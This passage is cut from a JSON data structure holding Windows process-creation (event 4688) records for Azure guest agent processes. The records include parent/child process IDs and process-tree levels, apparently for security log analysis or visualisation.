x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EffectiveLogonId_par\":[\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EventID\":[\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\",\"4688\"],\"IsBranch\":[false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false],\"IsLeaf\":[false,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true,false,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,3,4,2,3,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4,2,3,2,3,3,4,2,3,3,4,2,3,3,4,2,3,3,4],\"NewProcessId\":[\"0x1994\",\"0x123c\",\"0x20b0\",\"0xccc\",\"0x14ec\",\"0xda8\",\"0x1cfc\",\"0x7fc\",\"0x108c\",\"0x798\",\"0x22e0\",\"0x172c\",\"0x1dec\",\"0xe2c\",\"0x1080\",\"0xb14\",\"0x17ec\",\"0x1898\",\"0x1058\",\"0xe1c\",\"0x834\",\"0x17c4\",\"0x88c\",\"0x2e4\",\"0x108c\",\"0x1360\",\"0x19f4\",\"0x19f0\",\"0x1570\",\"0x17a8\",\"0x1058\",\"0x82c\",\"0xd44\",\"0x1bfc\",\"0x1998\",\"0x1c10\",\"0x1184\",\"0xc6c\",\"0x454\",\"0x65c\",\"0xe1c\",\"0x1070\",\"0x1ce8\",\"0xb10\",\"0x2260\",\"0x1c54\",\"0x181c\",\"0x8c0\",\"0x1f60\",\"0x123c\",\"0x518\",\"0xc98\",\"0x1cdc\",\"0x1484\",\"0xb14\",\"0x16bc\",\"0x1bb4\",\"0x1be4\",\"0xec4\",\"0xd68\",\"0xb64\",\"0x1eb4\",\"0xc98\",\"0x6f8\",\"0x84c\",\"0x1d6c\",\"0x490\",\"0x16d4\",\"0xa2c\",\"0x65c\",\"0x12fc\",\"0xd78\",\"0x221c\",\"0x1238\",\"0x1584\"],\"NewProcessId_par\":[\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\"],\"NewProcessName\":[\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"ProcessId\":[\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x1994\",\"0x1994\",\"0x123c\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0x7fc\",\"NaN\",\"0x1994\",\"0x1994\",\"0x172c\",\"NaN\",\"0x1994\",\"0x1994\",\"0xb14\",\"NaN\",\"0x1994\",\"0x1994\",\"0xe1c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x2e4\",\"NaN\",\"0x1994\",\"0x1994\",\"0x19f0\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1bfc\",\"NaN\",\"0x1994\",\"0x1994\",\"0xc6c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1070\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1c54\",\"NaN\",\"0x1994\",\"0x1994\",\"0x123c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1484\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0xd68\",\"NaN\",\"0x1994\",\"0x1994\",\"0x6f8\",\"NaN\",\"0x1994\",\"0x1994\",\"0x16d4\",\"NaN\",\"0x1994\",\"0x1994\",\"0xd78\"],\"Row\":[75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4c